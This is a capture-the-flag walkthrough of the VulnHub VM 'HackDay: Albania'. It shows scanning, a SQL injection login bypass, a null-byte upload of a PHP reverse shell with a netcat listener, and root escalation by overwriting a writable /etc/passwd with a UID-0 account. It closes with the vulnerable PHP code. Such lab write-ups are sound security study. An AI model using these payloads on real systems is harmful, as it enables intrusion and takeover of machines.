[VULNHUB] HackDay: Albania

The HackDay: Albania is a really interesting VM where I lernt a few new things about SQLi and PHP.

TOO MUCH DIRECTORIES

First of all scan the available ports of the target:

nmap 192.168.1.19 -sV -p 1-65535

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-21 09:24 CET
Nmap scan report for 192.168.1.19
Host is up (0.013s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.20 seconds

So there is an SSH service and an HTTP one.
Before browsing to http://192.168.1.19:8008 let’s grab some infos from nikto:

nikto -h 192.168.1.19 -p 8008

I discovered that there are lot of entries into /robots.txt file so I opened it:

Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

Opening a few of them will appear the same image which says that it is not the correct directory. So I used curl with a for to discover which folder was correct. First of all I created a .txt file with folder names one per line without slashes then I created a script:

IFS=$'\n'       
for j in $(cat list.txt)
do
    printf "Testing $j folder...\n\n"
    curl -L http://192.168.1.19:8008/$j
    printf "\n\n"
done

On the terminal output I found a different HTML source code:

Testing unisxcudkqjydw folder...

IS there any /vulnbank/ in there ???

BINGO!

THIS BANK IS NOT SO SECURE

Browse to http://192.168.1.19/unisxcudkqjydw/vulnbank and I discovered that directory listing is active and there is only a folder (client) so I clicked on it and Very Secure Bank website appeared. There is a login form, I tried some SQLi techniques, so I putted a single quote char and an error occurred:

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102

Ok, seems to be vulnerable to SQLi. Now I spent lot of time finding the right pattern, I tried OR, AND, UNION without success. After some hours the idea, I used the comment to ignore the rest of the query like this:

user' #

I used the # because — comment returns an error while with the # I got only “Invalid Credentials…”. Now I bruteforced the username with Burpsuite. I captured the POST request and I used Intruder to achieve that with the following payload:

POST /unisxcudkqjydw/vulnbank/client/login.php HTTP/1.1
Host: 192.168.1.19:8008
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.19:8008/unisxcudkqjydw/vulnbank/client/login.php
Cookie: PHPSESSID=cfg95pqu6gukj980niqriu7uq0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=§user§' #&password=something

I used rockyou as wordlist ans after some time I discovered that jeff’ # worked. I logged with this string into the username field and the bank homepage of the user appeared. THere is an upload form for tickets where I can upload images. First of all I tried with a .gif but the page returned an error:

After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc...

So I tried with a .php%00.jpg using null byte and the image was succesfully uploaded. I clicked on the last ticket created and then on the image blank thumb but an error occurred:

Warning: include(): Failed opening 'upload/php-reverse-shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/unisxcudkqjydw/vulnbank/client/view_file.php on line 13

There is an include error, maybe there is an include function into the PHP code? If that is true I can upload a simple .jpg file with the php code inside and it will even interpreted as PHP. Let’s try. I used this reverse shell. The upload was successful: I started listen locally:

nc -lvp 1234

Then I opened the last ticket again and I got the reverse shell!

PAY ATTENTION TO SENSITIVE FILES, DEAR SYSADMIN

Now I need a TTY but python seems to be not installed but before I surrender let’s do some research:

find / -name "python*" 2>/dev/null

I found that there is python3 into /usr/bin/ folder, so I typed:

/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'

Now I have a TTY. I need to escalate privileges now. I found only an user into /home folder but is useless then I tried to search some files with bad permissions:

find / -writable -type f 2>/dev/null

And the first result was /etc/passwd file! So I copied the content locally and now I can add a new user. I need to generate an hashed password too because the new security policy of Linux doesn’t allow an user without a password:

openssl passwd -1

I used “test” as password and now I can add a new line into the passwd file:

test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash

Notice that I setted UID and GID to 0. Now I saved the file and I encoded it in base64:

cat passwd | base64 -w 0

Now I copied the base64 string and I typed this into the reverse shell:

echo "BASE64_STRING" | base64 -d > /etc/passwd

I omitted the base64 string because it was so long. Now verify that the file was overwritten:

cat /etc/passwd

This is the output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash

Now just log as test user:

su - test

And now we are logged in as root! List the file and you will find the flag:

cat flag.txt

Finished!

CONCLUSION

This is the source code of config.php, in particular focus on these strings:

function check_login($username,$password){
    
    $username = str_ireplace("OR", "", $username);
    $username = str_ireplace("UNION", "", $username);
    $username = str_ireplace("AND", "", $username);
    $password = str_ireplace("'","",$password);
    $sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
    $result = mysqli_fetch_assoc(execute_query($sql_query));
    $result = $result["ID"];
    if($result >= 1) {
    return $result;
    } else {
        return -1;
    }   
}

The strings OR, UNION, AND are filtered on the username field while the single quote is filtered in the password field. That’s why we used user’ # string. Also check out the view_file.php:

$klient_id = $_SESSION["id"];
$filename = $_GET["filename"];
if(endsWith($filename , ".jpg") || endsWith($filename , ".png") || endsWith($filename , ".jpeg") || endsWith($filename , ".bmp")) {
    include("upload/" . $_GET["filename"]);
    } else {
        echo "Only images are allowed to get included. We hate hackers.";
    }
}

This code checks only if the extension is .jpg, .png or .jpeg, if that is true it includes the file and execute it even if it has not .php extension.

[VULNHUB] HackDay: Albania

Leave a Reply

